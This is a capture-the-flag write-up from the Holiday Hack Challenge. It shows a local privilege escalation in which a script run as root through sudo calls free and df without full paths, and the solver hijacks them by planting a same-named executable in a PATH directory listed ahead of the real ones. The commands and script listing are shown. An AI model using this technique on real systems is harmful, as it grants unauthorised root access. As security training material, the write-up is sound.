Neighborhood Watch BypassΒΆ
Difficulty:
ObjectiveΒΆ
Task description
Assist Kyle at the old data center with a fire alarm that just won't chill.
Kyle Parrish
If you spot a fire, let me know! I'm Kyle, and I've been around the Holiday Hack Challenge scene for years as arnydo - picked up multiple Super Honorable Mentions along the way.
When I'm not fighting fires or hunting vulnerabilities, you'll find me on a unicycle or juggling - I once showed up a professional clown with his own clubs!
My family and I love exploring those East Tennessee mountains, and honestly, geocaching teaches you a lot about finding hidden things - useful in both firefighting and hacking.
Anyway, I could use some help here. This fire alarm keeps going nuts but there's no fire. I checked.
I think someone has locked us out of the system. Can you see if you can get back in?
HintsΒΆ
Path Hijacking
Be careful when writing scripts that allow regular users to run them. One thing to be wary of is not using full paths to executables...these can be hijacked.
What Are My Powers?
You know, Sudo is a REALLY powerful tool. It allows you to run executables as ROOT!!! There is even a handy switch that will tell you what powers your user has.
SolutionΒΆ
We need to execute the script runtoanswer as root to solve this challenge.
We can check allowed commands for the invoking user using sudo -l (see hints):
π chiuser @ Dosis Neighborhood ~ π $ sudo -l
Matching Defaults entries for chiuser on 7ff5c7a0bc86:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, secure_path=/home/chiuser/bin\:/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+="API_ENDPOINT API_PORT RESOURCE_ID HHCUSERNAME", env_keep+=PATH
User chiuser may run the following commands on 7ff5c7a0bc86:
(root) NOPASSWD: /usr/local/bin/system_status.sh
This shows us that we can run a script named system_status.sh as root. Let's have a look what this script contains:
π chiuser @ Dosis Neighborhood ~/bin π $ cat /usr/local/bin/system_status.sh
#!/bin/bash
echo "=== Dosis Neighborhood Fire Alarm System Status ==="
echo "Fire alarm system monitoring active..."
echo ""
echo "System resources (for alarm monitoring):"
free -h
echo -e "\nDisk usage (alarm logs and recordings):"
df -h
echo -e "\nActive fire department connections:"
w
echo -e "\nFire alarm monitoring processes:"
ps aux | grep -E "(alarm|fire|monitor|safety)" | head -5 || echo "No active fire monitoring processes detected"
echo ""
echo "π₯ Fire Safety Status: All systems operational"
echo "π¨ Emergency Response: Ready"
echo "π Coverage Area: Dosis Neighborhood (all sectors)"
We see usage of commands such as free and df without pointing to the actual binary, meaning the script relies on the $PATH variable to find the correct binaries. By creating our own malicious binary with the same name and placing it in a folder that listed before the folder of the legitimate binary in $PATH, we can hijack the execution. Since we can execute the script as root, we can then also execute other commands as root. This is called Path Hijacking.
The $PATH variable looks as follows:
π chiuser @ Dosis Neighborhood ~ π $ $PATH
bash: /home/chiuser/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: No such file or directory
We see that the bin folder in the user's home folder is checked first. Since we are logged in as that user, we can place our binary in there. Let's test this functionality with a placeholder command echo:
π chiuser @ Dosis Neighborhood ~/bin π $ echo "echo 'path hijack'" > free
π chiuser @ Dosis Neighborhood ~/bin π $ chmod +x free
π chiuser @ Dosis Neighborhood ~/bin π $ /usr/local/bin/system_status.sh
=== Dosis Neighborhood Fire Alarm System Status ===
Fire alarm system monitoring active...
System resources (for alarm monitoring):
path hijack
...
Solution
Using Path Hijacking, we can execute the ./runtoanswer binary as root and solve the challenge:
ImagesΒΆ
Challenge terminal.
ResponseΒΆ
Kyle Parrish
Wow! Thank you so much! I didn't realize seudo was so powerful. Especially when misconfigured. Who knew a simple privilege escalation could unlock the whole fire safety system?
Now... will you sudo make me a sandwich?